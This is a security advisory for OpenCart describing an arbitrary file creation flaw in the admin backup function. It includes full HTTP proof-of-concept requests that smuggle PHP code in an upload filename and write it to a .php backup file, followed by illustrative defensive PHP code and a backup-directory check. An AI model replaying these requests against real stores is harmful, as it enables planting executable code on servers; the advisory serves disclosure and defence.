There is no fixed version for opencart/opencart.
opencart/opencart is a shopping cart system.
Affected versions of this package are vulnerable to Arbitrary File Creation. An Arbitrary File Creation issue was identified via the database restoration functionality. By injecting PHP code into the database, an attacker with admin privileges can create a backup file with an arbitrary filename (including the extension) within /system/storage/backup.
Note: It is less likely for the created file to be available within the web root, as the application's security recommendations suggest moving the storage path outside of the web root.
All user input ($_GET, $_POST etc.) is passed through htmlspecialchars at startup, so by default it will be stored in the database encoded. There are some places where this isn't the case though, such as the filename parameter of the admin tool/upload.upload route:
POST http://127.0.0.1/opencart/admin/index.php?route=tool/upload.upload&user_token=cd4d0433339a18c414c67e090c96a9f2 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------77933938835128784303963783419
Content-Length: 245
Origin: http://127.0.0.1
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
Cookie: OCSESSID=4ae25f8f71432cba08ae148b63; currency=USD; authorize=7d90c76197634c3ac515bdf5fc3c6c7b

-----------------------------77933938835128784303963783419
Content-Disposition: form-data; name="file"; filename="my_<?php phpinfo() ?>file.png"
Content-Type: image/png

XXX
-----------------------------77933938835128784303963783419--
html_entity_decode is used to decode the input, which allows the htmlspecialchars encoding to be bypassed. This filename data is stored within the oc_upload database table.
By restoring the table and supplying the filename parameter, it is possible to write the records to an arbitrary file, e.g. my_script.php:
POST http://127.0.0.1/opencart/admin/index.php?route=tool/backup.backup&user_token=cd4d0433339a18c414c67e090c96a9f2&table=oc_upload&filename=my_script.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 22
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/opencart/admin/index.php?route=tool/backup&user_token=cd4d0433339a18c414c67e090c96a9f2
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Cookie: OCSESSID=4ae25f8f71432cba08ae148b63; currency=USD; authorize=7d90c76197634c3ac515bdf5fc3c6c7b

backup%5B%5D=oc_upload
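As an added illustration (not code from this advisory or from the OpenCart project), the PHP below models the two weak points described above, the html_entity_decode step on the upload filename and the unrestricted filename on the backup route, each beside a hardened form, and adds a check an operator can run over the backup directory. BACKUP_DIR, the function names and the sample inputs are assumptions; the real OpenCart controllers are not reproduced.

```php
<?php
// Added example, not OpenCart's code. BACKUP_DIR and every function name
// here are hypothetical; they model the two weak points the advisory describes.

const BACKUP_DIR = '/var/www/opencart/system/storage/backup'; // assumed location

// Weak pattern (backup route): the caller-supplied filename, extension
// included, is joined to the backup directory unchanged.
function weak_backup_path(string $filename): string
{
    return BACKUP_DIR . '/' . $filename;
}

// Hardened pattern: drop any directory part, drop whatever extension was
// supplied, allow only a conservative character set, and force ".sql".
// Returning null is deliberate: silently "fixing" odd names hides probing.
function safe_backup_path(string $filename): ?string
{
    $base = preg_replace('/\.[^.]*$/', '', basename($filename));
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $base)) {
        return null;
    }
    return BACKUP_DIR . '/' . $base . '.sql';
}

// Weak pattern (upload route): decoding entities hands back the raw
// characters that htmlspecialchars() neutralised at startup, so a PHP
// open tag reaches the oc_upload table intact.
function weak_store_filename(string $escaped): string
{
    return html_entity_decode($escaped, ENT_QUOTES, 'UTF-8');
}

// Hardened pattern: never decode, and restrict the stored name to a
// character set that cannot carry markup, entities or path separators.
function safe_store_filename(string $escaped): ?string
{
    $base = basename($escaped);
    return preg_match('/^[A-Za-z0-9_.-]{1,128}$/', $base) ? $base : null;
}

// Operator check: a legitimate dump is a .sql file and never needs a PHP
// open tag, so anything else in the backup directory deserves a look.
function find_suspicious_backups(string $dir): array
{
    $hits = [];
    foreach (glob($dir . '/*') ?: [] as $path) {
        if (!is_file($path)) {
            continue;
        }
        $notSql = strtolower(pathinfo($path, PATHINFO_EXTENSION)) !== 'sql';
        $hasTag = strpos((string) file_get_contents($path), '<?php') !== false;
        if ($notSql || $hasTag) {
            $hits[] = $path;
        }
    }
    return $hits;
}

// Walk-through with constructed inputs (the upload name is the one from the
// advisory's first request; the backup name is the one from its second).
$escaped = htmlspecialchars('my_<?php phpinfo() ?>file.png', ENT_QUOTES, 'UTF-8');
var_dump($escaped);                          // entity-encoded form written at startup
var_dump(weak_store_filename($escaped));     // decoding restores the PHP open tag
var_dump(safe_store_filename($escaped));     // rejected: '&', ';' and spaces fail the allow-list
var_dump(weak_backup_path('my_script.php'));
var_dump(safe_backup_path('my_script.php'));    // supplied extension replaced by .sql
var_dump(safe_backup_path('../../index.php'));  // directory part removed by basename()
var_dump(find_suspicious_backups(BACKUP_DIR));
```

The allow-list approach matters more than any single filter: the advisory's bypass works precisely because one code path undoes an encoding another path relied on, so the backup route should not trust anything upstream and should impose its own shape on the output filename. The directory check is cheap to schedule and flags exactly the artefact this issue produces, a non-.sql file, or a file carrying PHP, under system/storage/backup.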